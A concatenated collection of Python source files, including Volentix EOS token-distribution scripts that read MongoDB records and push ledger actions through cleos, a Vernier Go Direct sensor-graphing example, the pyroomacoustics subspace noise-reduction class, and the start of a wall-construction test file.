logging.error('Mongo collection: %s' % e)
print(e)
with open('ignore.list', 'w') as f:
for trx in IGNORE:
f.write("%s\n" % (trx))
for trx in NOT_SURE:
f.write("%s\n" % (trx))
print(EOS_RPC)
print('TOTAL: ', TOTAL_DOCUMENTS)
# total number of tokens to send
# get_stats(collection)
counter = 1
with open('execute.list', 'w') as f:
for document in collection.find():
# Remove blacklisted transactions
if document['trx_id'] in IGNORE or document['trx_id'] in NOT_SURE:
continue
else:
# Remove transactions below 1000
if float(document['amount']) <= 1000:
# if document['fromaccount'] == 'vtxsmsupport':
amount = "{0:.4f}".format(float(document['amount']))
account = get_account(document['tokey'].strip())['account_names']
print(counter, document['trx_id'], document['tokey'], document['fromaccount'], amount, account)
logging.info("%s - %s - %s - %s - %s" % (document['trx_id'], document['tokey'], document['fromaccount'], amount, account))
f.write("%s - %s - %s - %s - %s\n" % (document['trx_id'], document['tokey'], document['fromaccount'], amount, account))
amount = ''
account = ''
counter +=1
print("*"*150)
logging.info("Start executing.")
if __name__ == "__main__":
filename = 'preparator.log'
try:
open(filename, 'w').close()
except Exception as e:
print(e)
try:
logging.basicConfig(format='%(levelname)s:%(asctime)s:%(message)s',
filename=filename,
level=logging.DEBUG,
datefmt='%m/%d/%Y %I:%M:%S %p')
except Exception as e:
logging.error('ConfigParser: %s' % e)
print(e)
else:
logging.info('Launch the app.')
config = configparser.ConfigParser()
try:
config.read('deductor_config')
logging.info('Config reading.')
except Exception as e:
logging.error('Could not read the config: %s', e)
print(e)
else:
default = config['DEFAULT']
MONGODB_URL = default.get('MONGODB_URL') or ''
MONGODB_USER = default.get('MONGODB_USER') or ''
MONGODB_PASS = default.get('MONGODB_PASS') or ''
EOS_RPC = default.get('EOS_RPC') or ''
POOL_API = default.get('POOL_API') or ''
EOS_CREATOR = default.get('EOS_CREATOR') or ''
DB = default.get('DB') or ''
COLLECTION = default.get('COLLECTION') or ''
            TIMEOUT = int(default.get('TIMEOUT') or 10)  # default to 10 s when unset
try:
logging.info('Run preparator.')
setup()
except KeyboardInterrupt:
logging.warning('Exit the app. Keyboard interruption.')
print('\nKeyboard interruption. \nExit.')
except Exception as e:
logging.error('Exit by other reason: %s', e)
print(e)
```
#### File: volentix_tools/executor/executor.py
```python
from pymongo import MongoClient
import logging
import configparser
import json
import subprocess
import os
import time
# Initial balances:
# volentixtrez 454990000.0000 VTX
# volentixprvt 65000000.0000 VTX
# volentixprir 130000000.0000 VTX
# vtxsmsupport 99000000.0000 VTX
# vtxmesupport 99000000.0000 VTX
# vtxcontribut 156000000.0000 VTX
# volentixtrus 0.0000 VTX
def runKeosd():
stopKeosd()
try:
out = os.spawnl(os.P_NOWAIT, 'keosd', '--unlock-timeout', '90000')
except Exception as e:
print(e)
return 'Could not run keosd: ' + str(e)
else:
return 'Run keosd: ' + str(out)
def stopKeosd():
try:
out = subprocess.run(['cleos', 'wallet', 'stop'], timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = e
except Exception as e:
print(e)
out = e
finally:
return 'Stop keosd: ' + str(out)
def get_balances():
accounts = ['volentixprvt', 'volentixprir', 'volentixtrez', 'vtxcontribut', 'vtxsmsupport', 'vtxmesupport', 'volentixtrus']
balances = {}
for x in accounts:
try:
out = subprocess.run(['cleos', '-u', EOS_RPC, 'get', 'currency', 'balance', 'volentixgsys', x],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
out = 'Timeout. Can not get balance\n' + str(e)
except Exception as e:
out = 'Could not get balance\n' + str(e)
else:
balances[x] = str(out).replace('\n','')
return balances
def showBad(document):
# TODO fix the conditions so that it doesn't display duplicates
if len(document['tokey']) < 50:
print(document['trx_id'], " - ", document['tokey'])
if len(document['tokey']) != 53:
print(document['trx_id'], " - ", document['tokey'])
if float(document['amount']) <= 0:
print(document['trx_id'], " - ", document['amount'])
if float(document['amount']) > 5000000:
print(document['trx_id'])
if "EOS" not in document['tokey']:
print(document['trx_id'], " - ", document['tokey'])
if 'test' in document['comment']:
print(document['trx_id'], " - ", document['comment'])
if float(document['amount']) >= 500000 and float(document['amount']) <= 5000000:
print(document['trx_id'], " - ", document['tokey'], " - ", document['amount'])
def execute(fromaccount, toaccount, amount, tokey, comment, nonce, trx_id):
amount = "{0:.4f}".format(float(amount))
body = ''
out = ''
try:
body = '[\"'+fromaccount+'\",\"'+toaccount+'\",\"'+amount +' VTX'+'\",\"'+tokey+'\",\"'+'Ledger: '+comment+'\",\"'+nonce+'\"]'
out = subprocess.run(['cleos', '-u', EOS_RPC, 'push', 'action', 'crowdfledger', 'rcrdtfr', body, '-p', 'crowdfledger'],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
out = str(out)
except subprocess.TimeoutExpired as e:
print('FAIL:TIMEOUT: ', fromaccount, toaccount, amount, tokey, comment, nonce)
print('Timeout. Can not execute transaction.\n' + str(e))
logging.error("FAIL:TIMEOUT: %s, %s, %s, %s, %s, %s, %s" % (fromaccount, toaccount, amount, tokey, comment, nonce, trx_id))
logging.error("Timeout. Can not execute transaction.: %s" % str(e))
return False
except Exception as e:
print('FAIL:EXCEPTION: ', fromaccount, toaccount, amount, tokey, comment, nonce)
print('Could not execute transaction.\n' + str(e))
logging.error("FAIL:EXCEPTION: %s, %s, %s, %s, %s, %s, %s" % (fromaccount, toaccount, amount, tokey, comment, nonce, trx_id))
logging.error("Could not execute transaction: %s" % str(e))
return False
else:
if 'Error' in out:
if 'overdrawn balance' in out:
if fromaccount == 'vtxsmsupport':
try:
fromaccount = "vtxmesupport"
comment = 'Ledger: Change crowdfund pool: vtxsmsupport -> vtxmesupport'
body = '[\"'+fromaccount+'\",\"'+toaccount+'\",\"'+amount +' VTX'+'\",\"'+tokey+'\",\"'+comment+'\",\"'+nonce+'\"]'
out = subprocess.run(['cleos', '-u', EOS_RPC, 'push', 'action', 'crowdfledger', 'rcrdtfr', body, '-p', 'crowdfledger'],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
out = str(out)
except subprocess.TimeoutExpired as e:
print('FAIL:TIMEOUT:CHANGE_POOL: ', fromaccount, toaccount, amount, tokey, comment, nonce)
print('Timeout. Can not execute transaction.\n' + str(e))
logging.error("FAIL:TIMEOUT:CHANGE_POOL: %s, %s, %s, %s, %s, %s, %s" % (fromaccount, toaccount, amount, tokey, comment, nonce, trx_id))
logging.error("Timeout. Can not execute transaction: %s" % str(e))
return False
except Exception as e:
print('FAIL:EXCEPTION:CHANGE_POOL: ', fromaccount, toaccount, amount, tokey, comment, nonce)
print('Could not execute transaction.\n' + str(e))
logging.error("FAIL:EXCEPTION:CHANGE_POOL: %s, %s, %s, %s, %s, %s, %s" % (fromaccount, toaccount, amount, tokey, comment, nonce, trx_id))
logging.error("Could not execute transaction: %s" % str(e))
return False
else:
print('PASS:CHANGE_POOL: ', fromaccount, toaccount, amount, tokey, comment, nonce)
print(out)
logging.info("PASS:CHANGE_POOL: %s, %s, %s, %s, %s, %s, %s" % (fromaccount, toaccount, amount, tokey, comment, nonce, trx_id))
logging.info("%s" % out)
return True
print('FAIL:ERROR: ', fromaccount, toaccount, amount, tokey, comment, nonce)
print(out)
logging.error("FAIL:ERROR: %s, %s, %s, %s, %s, %s, %s" % (fromaccount, toaccount, amount, tokey, comment, nonce, trx_id))
logging.error("%s" % out)
return False
else:
print('PASS: ', fromaccount, toaccount, amount, tokey, comment, nonce)
print(out)
logging.info("PASS: %s, %s, %s, %s, %s, %s, %s" % (fromaccount, toaccount, amount, tokey, comment, nonce, trx_id))
logging.info("%s" % out)
return True
def setup():
try:
client = MongoClient(MONGODB_URL,username=MONGODB_USER,password=<PASSWORD>DB_<PASSWORD>)
except Exception as e:
logging.error('Connect to the mongo: %s' % e)
print(e)
try:
db = client[DB]
except Exception as e:
logging.error('Mongo database: %s' % e)
print(e)
try:
collection = db[COLLECTION]
TOTAL_DOCUMENTS = collection.count_documents({})
except Exception as e:
logging.error('Mongo collection: %s' % e)
print(e)
print("Unique keys: ", len(collection.distinct('tokey')))
print("#"*45)
balances = get_balances()
for key, value in balances.items():
print("%s - %s" % (key, value))
logging.info("Balance: %s - %s" % (key, value))
print("#"*45)
PASSED_DOCUMENTS = 0
logging.info("Start executing.")
for document in collection.find():
showBad(document)
# stat = execute(document['fromaccount'],
# document['toaccount'],
# document['amount'],
# document['tokey'],
# document['comment'],
# document['nonce'],
# document['trx_id'])
# if stat:
# PASSED_DOCUMENTS +=1
# time.sleep(1.5)
# print(PASSED_DOCUMENTS,"/",TOTAL_DOCUMENTS)
print("#"*45)
balances = get_balances()
for key, value in balances.items():
print("%s - %s" % (key, value))
logging.info("Balance: %s - %s" % (key, value))
print("#"*45)
print("Total documents in collection:", TOTAL_DOCUMENTS)
print("Passed documents in collection:", PASSED_DOCUMENTS)
logging.info("Total documents in collection: %s" % TOTAL_DOCUMENTS)
logging.info("Passed documents in collection: %s" % PASSED_DOCUMENTS)
print("#"*45)
if __name__ == "__main__":
filename = 'executor.log'
try:
open(filename, 'w').close()
except Exception as e:
print(e)
try:
logging.basicConfig(format='%(levelname)s:%(asctime)s:%(message)s',
filename=filename,
level=logging.DEBUG,
datefmt='%m/%d/%Y %I:%M:%S %p')
except Exception as e:
logging.error('ConfigParser: %s' % e)
print(e)
else:
logging.info('Launch the app.')
config = configparser.ConfigParser()
try:
config.read('executor_config')
logging.info('Config reading.')
except Exception as e:
logging.error('Could not read the config: %s', e)
print(e)
else:
default = config['DEFAULT']
MONGODB_URL = default.get('MONGODB_URL') or ''
MONGODB_USER = default.get('MONGODB_USER') or ''
MONGODB_PASS = default.get('MONGODB_PASS') or ''
EOS_RPC = default.get('EOS_RPC') or ''
DB = default.get('DB') or ''
COLLECTION = default.get('COLLECTION') or ''
            TIMEOUT = int(default.get('TIMEOUT') or 10)  # default to 10 s when unset
try:
logging.info('Run executor.')
# print(runKeosd())
setup()
except KeyboardInterrupt:
# print(stopKeosd())
logging.warning('Exit the app. Keyboard interruption.')
print('\nKeyboard interruption. \nExit.')
except Exception as e:
# print(stopKeosd())
logging.error('Exit by other reason: %s', e)
print(e)
```
#### File: volentix_tools/updater/updater.py
```python
from pymongo import MongoClient
import urllib.parse
import requests
import logging
import configparser
import json
def get_pool(trx_id):
try:
data = requests.get(POOL_API+trx_id)
except Exception as e:
print(e)
logging.error("Couldn't get the data: %s" % e)
else:
raw = json.loads(data.text)
if raw['success']:
return raw['pool'].strip()
else:
return ''
def setup():
try:
client = MongoClient(MONGODB_URL,username=MONGODB_USER,password=<PASSWORD>)
except Exception as e:
logging.error('Connect to the mongo: %s' % e)
print(e)
try:
db = client[DB]
except Exception as e:
logging.error('Mongo database: %s' % e)
print(e)
try:
collection = db[COLLECTION]
TOTAL_DOCUMENTS = collection.count_documents({})
except Exception as e:
logging.error('Mongo collection: %s' % e)
print(e)
UPDATED_DOCUMENTS = 0
for document in collection.find():
pool = get_pool(document['trx_id'])
# Update transaction if there is a pool for it
if pool:
try:
collection.update_one({"trx_id": document['trx_id']}, {"$set": {"fromaccount": pool}})
except Exception as e:
print("Couldn't update: %s, %s" % (document['trx_id'], e))
logging.error("Couldn't update: %s, with pool: %s. Error: %s" % (document['trx_id'], pool, e))
else:
logging.debug("Update: [%s] with pool: %s" % (document, pool))
print("%s = %s -> %s" % (document['trx_id'], document['fromaccount'], pool))
logging.info("%s = %s -> %s" % (document['trx_id'], document['fromaccount'], pool))
UPDATED_DOCUMENTS+=1
else:
# Update transaction with private pool transaction is valid and there is no pool for it
if 'EOS' in document['tokey'] and len(document['tokey']) > 50:
try:
collection.update_one({"trx_id": document['trx_id']}, {"$set": {"fromaccount": 'volentixprvt'}})
except Exception as e:
print("Couldn't update: %s, %s" % (document['trx_id'], e))
logging.error("Couldn't update: %s, with pool: %s. Error: %s" % (document['trx_id'], 'volentixprvt', e))
else:
logging.debug("Update: [%s] with pool: %s" % (document, 'volentixprvt'))
print("%s = %s --> %s" % (document['trx_id'], document['fromaccount'], 'volentixprvt'))
logging.info("%s = %s -> %s" % (document['trx_id'], document['fromaccount'], 'volentixprvt'))
UPDATED_DOCUMENTS+=1
# Delete transaction if it is not valid
# else:
# try:
# collection.delete_one({"trx_id": document['trx_id']})
# except Exception as e:
# print("Couldn't delete: %s, %s" % (document['trx_id'], e))
# logging.error("Couldn't delete: %s. Error: %s" % (document['trx_id'], e))
# else:
# logging.debug("Delete: [%s]" % (document))
# print("%s = %s -> [IGNORE]" % (document['trx_id'], document['fromaccount']))
# logging.info("%s = %s -> [IGNORE]" % (document['trx_id'], document['fromaccount']))
print("#"*45)
print("Total documents in collection:", TOTAL_DOCUMENTS)
print("Updated documents in collection:", UPDATED_DOCUMENTS)
logging.info("Total documents in collection: %s" % TOTAL_DOCUMENTS)
logging.info("Updated documents in collection: %s" % UPDATED_DOCUMENTS)
print("#"*45)
def upd():
try:
client = MongoClient(
MONGODB_URL, username=MONGODB_USER, password=<PASSWORD>DB_PASS)
except Exception as e:
logging.error('Connect to the mongo: %s' % e)
print(e)
try:
db = client[DB]
except Exception as e:
logging.error('Mongo database: %s' % e)
print(e)
try:
collection = db[COLLECTION]
TOTAL_DOCUMENTS = collection.count_documents({})
except Exception as e:
logging.error('Mongo collection: %s' % e)
print(e)
try:
collection.update_many({"toaccount": "vtxtrust"}, {"$set": {"toaccount": "volentixtrus"}})
except Exception as e:
print("Couldn't update: %s" % e)
UPDATED_DOCUMENTS = collection.count_documents({'toaccount': 'volentixtrus'})
print("#"*45)
print("Total documents in collection:", TOTAL_DOCUMENTS)
print("Updated documents in collection:", UPDATED_DOCUMENTS)
logging.info("Total documents in collection: %s" % TOTAL_DOCUMENTS)
logging.info("Updated documents in collection: %s" % UPDATED_DOCUMENTS)
print("#"*45)
if __name__ == "__main__":
filename = 'updater.log'
try:
open(filename, 'w').close()
except Exception as e:
print(e)
try:
logging.basicConfig(format='%(levelname)s:%(asctime)s:%(message)s',
filename=filename,
level=logging.DEBUG,
datefmt='%m/%d/%Y %I:%M:%S %p')
except Exception as e:
logging.error('ConfigParser: %s' % e)
print(e)
else:
logging.info('Launch the app.')
config = configparser.ConfigParser()
try:
config.read('updater_config')
logging.info('Config reading.')
except Exception as e:
logging.error('Could not read the config: %s', e)
print(e)
else:
default = config['DEFAULT']
MONGODB_URL = default.get('MONGODB_URL') or ''
MONGODB_USER = default.get('MONGODB_USER') or ''
MONGODB_PASS = default.get('MONGODB_PASS') or ''
POOL_API = default.get('POOL_API') or ''
DB = default.get('DB') or ''
COLLECTION = default.get('COLLECTION') or ''
try:
logging.info('Run updater.')
setup()
# upd()
except KeyboardInterrupt:
logging.warning('Exit the app. Keyboard interruption.')
print('\nKeyboard interruption. \nExit.')
except Exception as e:
logging.error('Exit by other reason: %s', e)
print(e)
``` |
{
"source": "4beddgroup221/godirect-examples",
"score": 3
} |
#### File: godirect-examples/python/gdx_getting_started_graphing.py
```python
import time
import matplotlib.pyplot as plt
from gdx import gdx #The gdx function calls are from a gdx.py file inside the gdx folder, which must be with this program.
gdx = gdx.gdx()
fig, ax = plt.subplots()
# CHANGE TO MATCH YOUR EXPERIMENT
time_between_readings_in_seconds = 0.5
number_of_readings = 20
digits_of_precision = 2
#gdx.open_usb() # Comment out if you are not using a USB connection.
gdx.open_ble() # Uncomment if you wish to connect via Bluetooth.
gdx.select_sensors() # You will be asked to select the sensors to be used. You can select up to three.
#gdx.select_sensors([1]) # You can also use an argument to select sensors. Separate multiple sensors with a comma, ([1,3])
# This gets the name and units of the sensors selected.
column_headers = gdx.enabled_sensor_info()
# Store the number of sensors. This variable is used in plot_graph() and print_table()
number_of_sensors=len(column_headers)
# Use the columm_headers to create a list of the units for each sensor.
# Use this list of units in the Collect loop below to add the units to the graph
unit_list = []
units = ''
for headers in column_headers:
units = str(headers[headers.find('(') : headers.find(')') +1])
unit_list.append(units)
# Save the column_headers as a string, to be used in the title of the graph
column_headers_string = str(column_headers)
column_headers_string = column_headers_string.replace("'","")
column_headers_string = column_headers_string.replace("[","")
column_headers_string = column_headers_string.replace("]","")
# Variables to store the time and readings from the sensors
sensor_times=[]
sensor_readings0=[]
sensor_readings1=[]
sensor_readings2=[]
print_table_string = []
plt.pause(1)
period_in_ms = time_between_readings_in_seconds*1000
#Start data collection at the specified rate. The period argument is in milliseconds
gdx.start(period_in_ms)
# This graphing function will be used to set up the graph and may be used during data collection to give you
# a "live" graph. Note that plotting to the graph during data collection may slow the data collection loop.
def plot_graph():
# Customize the graph See Pyplot documentation
ax.plot(sensor_times,sensor_readings0, color='r',label=column_headers[0]) #red line for sensor 1
# sensor_times and sensor_readings are variables storing the time and measurements from the data collection loop.
if (number_of_sensors>1):
ax.plot(sensor_times,sensor_readings1, color='b',label=column_headers[1]) #blue line for sensor 2
if (number_of_sensors>2):
ax.plot(sensor_times,sensor_readings2, color='k',label=column_headers[2]) #black line for sensor 3
plt.ylabel(column_headers_string) #name and units of the sensor selected#
plt.xlabel('Time(s)')
plt.grid(True) #This controls whether there is a grid on the graph
plt.pause (0.05) # display the graph briefly, as the readings are taken
def print_table():
print ("Data Table:")
print ('Time (s) ',column_headers_string) #label the data table that will be printed on the Python Shell
# The print_table_string is a list of strings. Each element in the list contains the time and readings.
# This variable is created in the Data Collection loop.
for string in print_table_string:
print(string)
# Data Collection:
collection_complete=False
while not collection_complete:
try:
        time = 0  # elapsed collection time in seconds (note: this shadows the imported time module, which is not used below)
print ('Collecting Data...')
# Print the column headers, starting with Time(s)
print('Time(s), ' + column_headers_string)
for i in range(0,number_of_readings):
# Create a list of times to be used in the graph and data table.
sensor_times.append(time)
# This is where we are reading the list of measurements from the sensors.
measurements=gdx.read()
            if measurements is None:
break
# Store each sensor's measurement in a list to be used in plot_graph() and print_table()
d = 0
data_string = ''
title_string =''
for data in measurements:
if d == 0:
sensor_readings0.append(data)
if d == 1:
sensor_readings1.append(data)
if d == 2:
sensor_readings2.append(data)
# Build a string for printing to the terminal and to be used as the title of the graph
round_data = str(round(data,digits_of_precision))
data_string = data_string + round_data + ' '
title_string = title_string + round_data + unit_list[d] + ' '
d += 1
# Create a list for the print_table() function. Only used for fast data collection
if time_between_readings_in_seconds<=0.4:
print_table_string.append(str(round(time,2)) + ' ' + data_string)
# For slower data collection, print the data to the terminal and the graph
if time_between_readings_in_seconds>0.4:
# Print the time and the data to the terminal
print(str(round(time,2)) + ' '+ data_string)
# If the last reading is finished update the graph's title
if i >=number_of_readings-1:
plt.title(column_headers_string +' vs '+'Time (s)')
# If collection is in process, use the data as the graph's title, for real-time updates
else:
plt.title(title_string)
# Call the plot_graph() function to update the graph with the new data set.
plot_graph()
# Update the time variable with the new time for the next data point
time = time+time_between_readings_in_seconds
# The data collection loop is finished
collection_complete=True
print ('data collection complete')
print ('Number of readings: ',i+1)
print ('Time between readings: ',time_between_readings_in_seconds, " s")
print ('Total time for data collection ', time, ' s')
# Stop sensor readings and disconnect the device.
gdx.stop()
gdx.close()
# For fast collection we did not print to the graph during data collection. Now that all data
# have been collected, send the data to the print_table() and plot_graph() function.
if time_between_readings_in_seconds<=0.4:
print_table()
plt.title(column_headers[0]+' vs '+'Time (s)') #put a title on the top of graph
plot_graph()
except KeyboardInterrupt:
collection_complete=True
gdx.stop() #Stop sensor readings
gdx.close()#Disconnect the device
print ('data collection stopped by keypress')
print ('Number of readings: ',i+1)
# Command to leave the graph window open when the program ends.
plt.show()
``` |
{
"source": "4bian/pyroomacoustics",
"score": 2
} |
#### File: pyroomacoustics/denoise/subspace.py
```python
import numpy as np
class Subspace(object):
"""
A class for performing **single channel** noise reduction in the time domain
via the subspace approach. This implementation is based off of the approach
presented in:
<NAME> and <NAME>, *A signal subspace approach for speech enhancement,*
IEEE Transactions on Speech and Audio Processing, vol. 3, no. 4, pp. 251-266, Jul 1995.
Moreover, an adaptation of the subspace approach is implemented here, as
presented in:
<NAME> and <NAME>, *A subspace approach for enhancing speech corrupted by colored noise,*
IEEE Signal Processing Letters, vol. 9, no. 7, pp. 204-206, Jul 2002.
Namely, an eigendecomposition is performed on the matrix:
.. math::
\Sigma = R_n^{-1} R_y - I,
where :math:`R_n` is the noise covariance matrix, :math:`R_y` is the
covariance matrix of the input noisy signal, and :math:`I` is the identity
matrix. The covariance matrices are estimated from past samples; the number
of past samples/frames used for estimation can be set with the parameters
`lookback` and `skip`. A simple energy threshold (`thresh` parameter) is
used to identify noisy frames.
The eigenvectors corresponding to the positive eigenvalues of
:math:`\Sigma` are used to create a linear operator :math:`H_{opt}` in order
to enhance the noisy input signal :math:`\mathbf{y}`:
.. math::
\mathbf{\hat{x}} = H_{opt} \cdot \mathbf{y}.
The length of :math:`\mathbf{y}` is specified by the parameter `frame_len`;
:math:`50\%` overlap and add with a Hanning window is used to reconstruct
the output. A great summary of the approach can be found in the paper by
<NAME> and <NAME> under Section III, B.
Adjusting the factor :math:`\\mu` presents a trade-off between noise
suppression and distortion.
Below is an example of how to use this class to emulate a streaming/online
input. A full example can be found `here <https://github.com/LCAV/pyroomacoustics/blob/master/examples/noise_reduction_subspace.py>`_.
Depending on your choice for `frame_len`, `lookback`, and `skip`, the
approach may not be suitable for real-time processing.
::
# initialize Subspace object
scnr = Subspace(frame_len=256, mu=10, lookback=10, skip=2, thresh=0.01)
# apply block-by-block
for n in range(num_blocks):
denoised_signal = scnr.apply(noisy_input)
There also exists a "one-shot" function.
::
# import or create `noisy_signal`
denoised_signal = apply_subspace(noisy_signal, frame_len=256, mu=10,
lookback=10, skip=2, thresh=0.01)
Parameters
----------
frame_len : int
Frame length in samples. Note that large values (above 256) will make
the eigendecompositions very expensive.
mu : float
Enhancement factor, larger values suppress more noise but could lead
to more distortion.
lookback : int
How many frames to look back for covariance matrix estimation.
skip : int
How many samples to skip when estimating the covariance matrices with
past samples. `skip=1` will use all possible frames in the estimation.
thresh : float
Threshold to distinguish between (signal+noise) and (noise) frames. A
high value will classify more frames as noise but might remove desired
signal!
data_type : 'float32' or 'float64'
Data type to use in the enhancement procedure. Default is 'float32'.
"""
def __init__(
self,
frame_len=256,
mu=10,
lookback=10,
skip=2,
thresh=0.01,
data_type="float32",
):
if frame_len % 2:
raise ValueError(
"Frame length should be even as this method " "performs 50% overlap."
)
        if data_type == "float64":
data_type = np.float64
else:
data_type = np.float32
self.frame_len = frame_len
self.mu = mu
self.dtype = data_type
self.hop = frame_len // 2
self.prev_samples = np.zeros(self.hop, dtype=data_type)
self.prev_output = np.zeros(self.hop, dtype=data_type)
self.current_out = np.zeros(self.hop, dtype=data_type)
self.win = np.hanning(frame_len).astype(data_type)
# enhancement filter parameter
self.h_opt = np.zeros((frame_len, frame_len), dtype=data_type)
# estimate (signal+noise) and noise covariance matrices
self.thresh = thresh
self.n_samples = self.hop * lookback + frame_len
self.input_samples = np.zeros(self.n_samples, dtype=data_type)
self.skip = skip
self.n_frames = lookback * (self.hop // skip)
self.n_noise_frames = np.ones(lookback) * (self.hop // skip)
self.cov_sn = np.zeros((frame_len, frame_len), dtype=data_type)
self._cov_sn = np.zeros((lookback, frame_len, frame_len), dtype=data_type)
self.cov_n = np.zeros((frame_len, frame_len), dtype=data_type)
self._cov_n = np.zeros((lookback, frame_len, frame_len), dtype=data_type)
def apply(self, new_samples):
"""
Parameters
----------
new_samples: numpy array
New array of samples of length `self.hop` in the time domain.
Returns
-------
numpy array
Denoised samples.
"""
if len(new_samples) != self.hop:
raise ValueError(
"Expected {} samples, got {}.".format(self.hop, len(new_samples))
)
new_samples = new_samples.astype(self.dtype)
# form input frame, 50% overlap
input_frame = np.r_[self.prev_samples, new_samples]
# update covariance matrix estimates
self.update_cov_matrices(new_samples)
# compute filter to project to signal subspace
self.compute_signal_projection()
# compute output
denoised_out = self.win * np.dot(self.h_opt, input_frame)
# update
self.prev_samples[:] = new_samples
self.current_out[:] = self.prev_output + denoised_out[: self.hop]
self.prev_output[:] = denoised_out[self.hop :]
return self.current_out
def compute_signal_projection(self):
sigma = np.linalg.lstsq(self.cov_n, self.cov_sn, rcond=None)[0] - np.eye(
self.frame_len
)
eigenvals, eigenvecs = np.linalg.eig(sigma)
n_pos = sum(eigenvals > 0)
order = np.argsort(eigenvals, axis=-1)[::-1]
pos_eigenvals = np.real(eigenvals[order][:n_pos])
q1 = np.zeros((self.frame_len, self.frame_len))
for w in range(0, n_pos):
q1[w, w] = pos_eigenvals[w] / (pos_eigenvals[w] + self.mu)
v_t = np.transpose(-eigenvecs[:, order])
self.h_opt[:] = np.real(np.dot(np.dot(np.linalg.pinv(v_t), q1), v_t))
# self.h_opt = np.dot(np.linalg.lstsq(v_t, q1, rcond=None)[0], v_t)
def update_cov_matrices(self, new_samples):
# remove cov of old samples
self.cov_sn *= self.n_frames
self.cov_sn -= self._cov_sn[0]
old_cov_n = self.cov_n.copy()
self.cov_n *= sum(self.n_noise_frames)
self.cov_n -= self._cov_n[0]
# update samples
self.input_samples = np.roll(self.input_samples, -self.hop)
self.input_samples[-self.hop :] = new_samples
# update cov matrices
self._cov_sn = np.roll(self._cov_sn, -1, axis=0)
self._cov_sn[-1, :, :] = np.zeros((self.frame_len, self.frame_len))
self._cov_n = np.roll(self._cov_n, -1, axis=0)
self._cov_n[-1, :, :] = np.zeros((self.frame_len, self.frame_len))
self.n_noise_frames = np.roll(self.n_noise_frames, -1)
self.n_noise_frames[-1] = 0
for i in range(0, self.hop, self.skip):
a = self.n_samples - self.hop - self.frame_len + i
b = a + self.frame_len
_noisy_signal = self.input_samples[a:b]
new_cov = np.outer(_noisy_signal, _noisy_signal).astype(self.dtype)
# (signal+noise) cov
self._cov_sn[-1] += new_cov
# noise cov
energy = np.std(_noisy_signal) ** 2
if energy < self.thresh:
self._cov_n[-1] += new_cov
self.n_noise_frames[-1] += 1
# if no new noise frames, use previous
if self.n_noise_frames[-1] == 0:
self._cov_n[-1] = old_cov_n
self.n_noise_frames[-1] = 1
# compute average for new estimate
self.cov_sn = (self.cov_sn + self._cov_sn[-1]) / self.n_frames
self.cov_n = (self.cov_n + self._cov_n[-1]) / sum(self.n_noise_frames)
def apply_subspace(
noisy_signal,
frame_len=256,
mu=10,
lookback=10,
skip=2,
thresh=0.01,
data_type=np.float32,
):
"""
One-shot function to apply subspace denoising approach.
Parameters
----------
noisy_signal : numpy array
Real signal in time domain.
frame_len : int
Frame length in samples. Note that large values (above 256) will make
the eigendecompositions very expensive. 50% overlap is used with
hanning window.
mu : float
Enhancement factor, larger values suppress more noise but could lead
to more distortion.
lookback : int
How many frames to look back for covariance matrix estimation.
skip : int
How many samples to skip when estimating the covariance matrices with
past samples. `skip=1` will use all possible frames in the estimation.
thresh : float
Threshold to distinguish between (signal+noise) and (noise) frames. A
high value will classify more frames as noise and might even remove
desired signal!
data_type : 'float32' or 'float64'
Data type to use in the enhancement procedure. Default is 'float32'.
Returns
-------
numpy array
Enhanced/denoised signal.
"""
scnr = Subspace(frame_len, mu, lookback, skip, thresh, data_type)
processed_audio = np.zeros(noisy_signal.shape)
n = 0
hop = frame_len // 2
while noisy_signal.shape[0] - n >= hop:
processed_audio[n : n + hop,] = scnr.apply(noisy_signal[n : n + hop])
# update step
n += hop
return processed_audio
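# Hedged usage sketch (not part of the original module): denoise a short
# synthetic signal with the one-shot helper defined above. The test signal,
# noise level and parameter values are illustrative assumptions only.
if __name__ == "__main__":
    fs = 16000
    t = np.arange(fs) / fs
    clean = 0.5 * np.sin(2 * np.pi * 440 * t)           # 1 s of a 440 Hz tone
    noisy = clean + 0.05 * np.random.randn(len(clean))  # add white noise
    denoised = apply_subspace(noisy, frame_len=256, mu=10,
                              lookback=10, skip=2, thresh=0.01)
    print(noisy.shape, denoised.shape)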
```
#### File: tests/tests_libroom/test_wall_construct.py
```python
from __future__ import division
import numpy as np
import pyroomacoustics as pra
eps = 1e-6
# The vertices of the wall are assumed to turn counter-clockwise around the
# normal of the wall
# A very simple wall
walls = [
{
"corners": np.array(
[[0.0, 1.0, 1.0, 0.0], [0.0, 0.0, 1.0, 1.0], [0.0, 0.0, 0.0, 0.0],]
),
"area": 1,
"absorption": [0.2],
"scattering": [0.1],
},
{
"corners": np.array([[-1, 1, 1], [1, -1, 1], [1, 1, -1],]),
"area": 3.4641016151377557, # this is an equilateral triangle with side sqrt(8)
"absorption": [0.2],
"scattering": [0.1],
},
]
def test_wall_3d_construct_0():
"""Tests construction of a wall"""
w_info = walls[0]
wall = pra.wall_factory(w_info["corners"], [0.2], [0.1])
return wall
def test_wall_3d_construct_1():
"""Tests construction of a wall"""
w_info = walls[1]
wall = pra.wall_factory(w_info["corners"], [0.2], [0.1])
return wall
def test_wall_3d_area_0():
"""Tests the area computation"""
w_info = walls[0]
wall = pra.wall_factory(
w_info["corners"], w_info["absorption"], w_info["scattering"]
)
err = abs(wall.area() - w_info["area"])
assert err < 1, "The error is {}".format(err)
def test_wall_3d_area_1():
"""Tests the area computation"""
w_info = walls[1]
wall = pra.wall_factory(
w_info["corners"], w_info["absorption"], w_info["scattering"]
)
err = abs(wall.area() - w_info["area"])
assert err < 1, "The error is {}".format(err)
def test_wall_3d_normal_0():
"""Tests direction of normal wrt to point arrangement"""
w_info = walls[0]
wall1 = pra.wall_factory(w_info["corners"], [0.2], [0.1])
# the same wall with normal pointing the other way
wall2 = pra.wall_factory(w_info["corners"][:, ::-1], [0.2], [0.1])
err = np.linalg.norm(wall1.normal + wall2.normal)
assert err < eps, "The error is {}".format(err)
def test_wall_3d_normal_1():
"""Tests direction of normal wrt to point arrangement"""
w_info = walls[1]
